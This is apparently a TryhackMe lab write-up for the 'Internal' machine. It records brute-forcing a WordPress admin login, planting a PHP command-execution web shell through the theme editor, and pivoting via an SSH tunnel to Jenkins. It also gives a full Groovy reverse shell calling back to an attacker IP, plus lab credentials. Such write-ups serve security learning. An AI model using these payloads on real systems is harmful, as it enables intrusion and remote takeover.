THM Machine Internal

Pre Engagement Briefing
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in three weeks.
Scope of Work
The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
User.txt
Root.txt
Additionally, the client has provided the following scope allowances:
Ensure that you modify your hosts file to reflect
internal.thm
Any tools or techniques are permitted in this engagement
Locate and note all vulnerabilities found
Submit the flags discovered to the dashboard
Only the IP address assigned to your machine is in scope
Scanning
IP Address
export tip=10.10.215.130
Nmap Scan Results
$ nmap -sCV --min-rate 100 --max-rate 100 -oN nmap_initial $tip
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http
|_http-title: Apache2 Ubuntu Default Page: It works
Enumeration
HTTP
$ ffuf -w /usr/share/wordlist/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://$ip/FUZZ
Content-Discovery
blog [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 187ms]
wordpress [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 188ms]
javascript [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 188ms]
phpmyadmin [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 190ms]
index.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 259ms]
wp-content [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 191ms]
wp-login.php [Status: 200, Size: 4530, Words: 211, Lines: 83, Duration: 211ms]
license.txt [Status: 200, Size: 19915, Words: 3331, Lines: 385, Duration: 186ms]
wp-includes [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 190ms]
wp-trackback.php [Status: 200, Size: 135, Words: 11, Lines: 5, Duration: 773ms]
wp-admin [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 185ms]
xmlrpc.php [Status: 405, Size: 42, Words: 6, Lines: 1, Duration: 214ms]
wp-signup.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 202ms]
It uses an old WordPress framework that is vulnerable to many attacks and admin
Users have a weak password.
$ wpscan --url http://internal.thm/blog/wp-login.php --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads 50
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://internal.thm/blog/wp-login.php/ [10.10.215.130]
[+] Started: Sat Aug 20 14:58:36 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://internal.thm/blog/wp-login.php/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] This site seems to be a multisite
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: http://codex.wordpress.org/Glossary#Multisite
[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-login.php/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
| Confirmed By:
| Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-includes/js/wp-util.min.js?ver=5.4.2
| Query Parameter In Install Page (Aggressive Detection)
| - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-admin/css/forms.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-admin/css/l10n.min.css?ver=5.4.2
|
| [!] 12 vulnerabilities identified:
|
| [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
| Fixed in: 5.4.5
| References:
| - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
| - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
| - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
| - https://core.trac.wordpress.org/changeset/50717/
| - https://www.youtube.com/watch?v=J2GXmxAdNWs
|
| [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
| Fixed in: 5.4.6
| References:
| - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
| - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
| - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
| - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
| - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
| - https://www.youtube.com/watch?v=HaW15aMzBUM
|
| [!] Title: WordPress 5.4 to 5.8 - Lodash Library Update
| Fixed in: 5.4.7
| References:
| - https://wpscan.com/vulnerability/5d6789db-e320-494b-81bb-e678674f4199
| - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
| - https://github.com/lodash/lodash/wiki/Changelog
| - https://github.com/WordPress/wordpress-develop/commit/fb7ecd92acef6c813c1fde6d9d24a21e02340689
|
| [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
| Fixed in: 5.4.7
| References:
| - https://wpscan.com/vulnerability/5b754676-20f5-4478-8fd3-6bc383145811
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39201
| - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-wh69-25hr-h94v
|
| [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
| Fixed in: 5.4.7
| References:
| - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
| - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5
|
| [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
| Fixed in: 5.4.8
| References:
| - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
| - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/ticket/54207
|
| [!] Title: WordPress < 5.8 - Plugin Confusion
| Fixed in: 5.8
| References:
| - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223
| - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/
|
| [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
| Fixed in: 5.4.9
| References:
| - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
| - https://hackerone.com/reports/1378209
|
| [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
| Fixed in: 5.4.9
| References:
| - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
| - https://hackerone.com/reports/425342
| - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
|
| [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
| Fixed in: 5.4.9
| References:
| - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
|
| [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
| Fixed in: 5.4.9
| References:
| - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
| - https://hackerone.com/reports/541469
|
| [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
| Fixed in: 5.4.10
| References:
| - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
| - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:06 <======================================> (137 / 137) 100.00% Time: 00:00:06
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / my2boys
Trying admin / calderon Time: 00:03:23 < > (3900 / 14348292) 0.02% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: my2boys
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 0
| Requests Remaining: 71
[+] Finished: Sat Aug 20 15:02:15 2022
[+] Requests Done: 4042
[+] Cached Requests: 184
[+] Data Sent: 1.434 MB
[+] Data Received: 19.859 MB
[+] Memory used: 253.984 MB
[+] Elapsed time: 00:03:38
We got admin
user credentials and now we can login with that.
Private Post has some Credentials
To-Do
Don't forget to reset Will's credentials. william:arnold147
Exploitation
Now we are login in so we can edit the php file from the following link like index.php
with our reverse shell code and visiting this will give us reverse shell or code execution. http://internal.thm/blog/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen
By editing and adding index.php
with the following code I can now run system commands
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
You can get the reverse shell directly but I like it this way.
After getting the reverse shell I see wp-config.php
that file contains MySQL Database credentials and found the following credentials.
DB_User: wordpress
DB_Password: wordpress123
Using that we can login with the MySQL database locally and there is a phpmyadmin
directory that is a GUI version of the interacting MySQL database so we can check him also for getting some useful things.
POST Exploitation
There is only one user aubreanna
. And I try every credential I found yet to login with that but no one works. And there are no special SUID
and Capabilities
binaries found that we can use for priv-esc.
But when I use the ls
command on the /opt
endpoint there is a file name wp-save.txt
that has some juicy things.
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
And It's a valid credential so use that to connect with ssh
In the user home directory, there's a file name jenkins.txt
that has the following content.
Internal Jenkins service is running on 172.17.0.2:8080
They mentioned there is a Jenkins
server running locally on port 8080
and we can confirm that using the ss -tupln
command. Now we have to do a port forward to access that port and we can do that using ssh port tunneling with the following syntax.
ssh -L local_port:local_address:remote_port username@remote_address
So our command looks like this.
ssh -L 8080:localhost:8080 aubreanna@internal.thm
After using the above command they tunnel the local Jenkins
server port to our local 8080
port so now we can access the Jenkins server. I try to default admin:admin
credentials but it doesn't work so I try a bruteforce attack. The bruteforce may take too much time and we can only guess the credentials by their response size so we have to filter our results with response size. I try using the hydra HTTP-form bruteforce method or some other method they didn't able to guess the password so we had to use burp intruder
or zap proxy
or any other method that can filter with response size. after that, we can get the following valid credentials
Jenkins Server Credentials
admin:spongebob
Now we are login in to Jenkins
so there are many ways we can get the reverse shell back from Jenkins
but I use the groovy
script method. First I got the /script
endpoint and there we have a groovy script box we can copy and paste the following groovy reverse shell scrip there and after running that we can get the reverse shell back.
String host="10.8.186.33";int port=5555;String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
After getting the Jenkins reverse shell I again use methods like finding SUID, GUID, and capabilities but didn't find anything useful so I use the ls /opt
command there is a file name note.txt
that has root user credentials. We can now login to the root user account with the followings credentials using ssh
root:tr0ub13guM!@#123
ssh root@internal.thm
password: tr0ub13guM!@#123
And we got a root user to use the cat
command to read the root.txt
file from the /root
directory submit it to TryhackMe and complete to room.
Last updated
Was this helpful?